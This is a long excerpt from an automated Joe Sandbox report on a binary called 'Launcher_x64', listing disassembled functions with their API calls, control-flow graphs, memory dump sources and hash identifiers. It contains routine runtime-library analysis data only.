                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 383 d23187-d23190 384 d23192-d231a5 RtlFreeHeap 383->384 385 d231bf-d231c0 383->385 384->385 386 d231a7-d231be GetLastError call d1ebad call d1eb64 384->386 386->385
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,?,00D27421,?,00000000,?,?,00D270C1,?,00000007,?,?,00D27A07,?,?), ref: 00D2319D
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00D27421,?,00000000,?,?,00D270C1,?,00000007,?,?,00D27A07,?,?), ref: 00D231A8
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 485612231-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8ec5d49243d942abc5e88b613e7d7676b18c4696e96c64371fbaf455669b0b7c
                                                                                                                                                                                                                                                                                        • Instruction ID: d08da92f9ab9e1eb6161c1d4667d5c1d527580f699806b86c04346b355cb87a4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ec5d49243d942abc5e88b613e7d7676b18c4696e96c64371fbaf455669b0b7c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 04E08C32100318ABCB122FA0BC09B993BAAEB44795F084024FA0CD6160CA3889A0CFB4
                                                                                                                                                                                                                                                                                        Function 00D14CF2 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 391 d14cf2-d14d17 392 d14d20-d14d28 391->392 393 d14d19-d14d1b 391->393 395 d14d50-d14d54 392->395 396 d14d2a-d14d34 392->396 394 d14e12-d14e1f call d12303 393->394 399 d14d5a-d14d69 call d153c3 395->399 400 d14e0c 395->400 396->395 398 d14d36-d14d4b 396->398 401 d14e11 398->401 405 d14d71-d14da6 399->405 406 d14d6b-d14d6f 399->406 400->401 401->394 412 d14dd2-d14dda 405->412 413 d14da8-d14dab 405->413 407 d14db9 call d14915 406->407 410 d14dbe-d14dd0 407->410 410->401 415 d14ddc-d14ded call d2088d 412->415 416 d14def-d14e0a 412->416 413->412 414 d14dad-d14db1 413->414 414->400 417 d14db3-d14db6 414->417 415->400 415->416 416->401 417->407
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: d8534c85fec3bf50382eda10a7e0af9f77d03954e5b48c068269900fa4d7f449
                                                                                                                                                                                                                                                                                        • Instruction ID: ab740a044ef45c3565d1169d8a674a2f83590bab5285fdac1a926a311c791e1d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8534c85fec3bf50382eda10a7e0af9f77d03954e5b48c068269900fa4d7f449
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35418075A0021ABBCF14DFA8E4909EEB7F9FF08314B54016AE541E7640EB31E991CBB0
                                                                                                                                                                                                                                                                                        Function 00D13A58 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 5ceee6d3c6af76ffef4f68b66ad0de1c60afbeda7056f87d3b0c6f9a6512b0a0
                                                                                                                                                                                                                                                                                        • Instruction ID: 99165ce48ec2d419f245d437f5d4f5074fbc157efb3ab80d0140aa212e3c06c9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ceee6d3c6af76ffef4f68b66ad0de1c60afbeda7056f87d3b0c6f9a6512b0a0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9831543250421ABFCF14DE68E9909E9B7B9BF19324B144259E551E3290EB31FA94CBB0
                                                                                                                                                                                                                                                                                        Function 00D12B92 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D12B03: GetModuleHandleExW.KERNEL32(00000002,00000000,00D0E5B1,?,?,00D12AC6,?,?,00D12A97,?,?,?,00D0E5B1), ref: 00D12B0F
                                                                                                                                                                                                                                                                                        • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,E7FA7683,?,?,?,00D33374,000000FF), ref: 00D12BF9
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D0B920: std::_Throw_Cpp_error.LIBCPMT ref: 00D0B94C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D0B920: std::_Throw_Cpp_error.LIBCPMT ref: 00D0B968
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D15C60: ReleaseSRWLockExclusive.KERNEL32(?,?,?,00D0B9E9,?,00D0FD92), ref: 00D15C75
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Cpp_errorThrow_std::_$CallbackExclusiveFreeHandleLibraryLockModuleReleaseReturnsWhen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1423221283-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 00d0bfb197017cdc3e2b8fab2b2caee7a1dea897a2688ac5ff0c4c61b2a57752
                                                                                                                                                                                                                                                                                        • Instruction ID: 4f9d1d870565fa0be594443abda409f34fdcbd7f598f9806d96cc30c696d188c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 00d0bfb197017cdc3e2b8fab2b2caee7a1dea897a2688ac5ff0c4c61b2a57752
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2111E236608644BBCB256F65FD01ABE7765EB41B20F18041AF905D67A4CF36E890CAB4
                                                                                                                                                                                                                                                                                        Function 00D241C4 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: b7b217f8284b073c936573e7890dd5d407c4e02f94cd13fe9e2ba24bbaf42f2e
                                                                                                                                                                                                                                                                                        • Instruction ID: 09a9e1a31828f6dba7a97cb6ce362a21430134fb44950c710f578a4c1c4448cd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7b217f8284b073c936573e7890dd5d407c4e02f94cd13fe9e2ba24bbaf42f2e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3C01D2372003249F8B028E69FC40A26376AFF96328B254124FA00CB254DA30E8408AB5
                                                                                                                                                                                                                                                                                        Function 00D13A4A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalLeaveSection
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3988221542-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 77489b1090966328f3f07c41f4870016e8a0d06eb2f7be2d783cdda5807c53e1
                                                                                                                                                                                                                                                                                        • Instruction ID: d11ac4dc9dab15a745ef4423f1ca118ea1ee39dd6de5fda9f23ae9d6f7ac5952
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77489b1090966328f3f07c41f4870016e8a0d06eb2f7be2d783cdda5807c53e1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF01D17660C6167BCB258BB8F9697E9BB50FF41334F24426FE052955C1DF22A690C370
                                                                                                                                                                                                                                                                                        Function 00D231C1 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00D122A9,?,?,00D03E32,00001000,?,00D03D7A), ref: 00D231F3
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3fa134e6d329365a484e02b01af2c890ee5036a1941e9d00bbceacd432312171
                                                                                                                                                                                                                                                                                        • Instruction ID: a4dcf3c02aab0657f60f28526e7a0adbd1f109b69bc404e92d5d52b085acee24
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3fa134e6d329365a484e02b01af2c890ee5036a1941e9d00bbceacd432312171
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7E02B3114033167D7222B61BC02B9B7B59EF227A4F080020FC1DD61D0CF59CE5182F0
                                                                                                                                                                                                                                                                                        Function 00D108D0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00D108F1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 118556049-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 238d24ba721e6323cc6bf01d29c27b2a15ce58c99b8b4b94d52b965bb8bb163e
                                                                                                                                                                                                                                                                                        • Instruction ID: 9385be6193074bd6914c088f36484f040f50677ab232478dbb475c1d6eea2e73
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 238d24ba721e6323cc6bf01d29c27b2a15ce58c99b8b4b94d52b965bb8bb163e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65E04F30C08308EBCB04FBB4E1455ADBBB4EFC4310F1040AAE84957351DB719E94CBA1
                                                                                                                                                                                                                                                                                        Function 00D0BDB0 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00D0BDD1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 118556049-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a30ae68e049c7e956b783bb4e37629f1f29edf683a27e5578c88f21e457d13c9
                                                                                                                                                                                                                                                                                        • Instruction ID: 1a12b61975f8c752765891ca395c54f355390212b7e13923f32a70660d975361
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a30ae68e049c7e956b783bb4e37629f1f29edf683a27e5578c88f21e457d13c9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9E0BF74D08208EBCB04EBA4D1556ADB7B5EFC4324F1040AAE44967391DB319E54CB75

                                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                                        Function 00D2EB72 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1479COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                                        • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                                        • Opcode ID: 6dd0deb7801d695a90f15acc70bc79e1eb8bc22a197e8fe4819ea50dbfc85a90
                                                                                                                                                                                                                                                                                        • Instruction ID: 67314ea32f1b65e0d39dc31f09bf279dd44cfec0fe6fca9466104450acfcf01c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6dd0deb7801d695a90f15acc70bc79e1eb8bc22a197e8fe4819ea50dbfc85a90
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7D21771E082288FDB65CF28ED407EAB7B5EB54309F1845EAD44DE7240D778AE818F61
                                                                                                                                                                                                                                                                                        Function 00D28B44 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00D28515,00000002,00000000,?,?,?,00D28515,?,00000000), ref: 00D28BDD
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,00D28515,00000002,00000000,?,?,?,00D28515,?,00000000), ref: 00D28C06
                                                                                                                                                                                                                                                                                        • GetACP.KERNEL32(?,?,00D28515,?,00000000), ref: 00D28C1B
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                                        • Opcode ID: e57decdd37a52e6218d956aa21e20c76ba66e0e136436aeee860d309e6587f8a
                                                                                                                                                                                                                                                                                        • Instruction ID: 16eda18aced5fe7286a0310bb74890f4cfac05d7844bb2afde14c5d01666f21f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e57decdd37a52e6218d956aa21e20c76ba66e0e136436aeee860d309e6587f8a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6421CD62702120AADB348F54F941A97B3A7EF74B68B5E8429E549D7200EF31DD40F770
                                                                                                                                                                                                                                                                                        Function 00D283DF Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
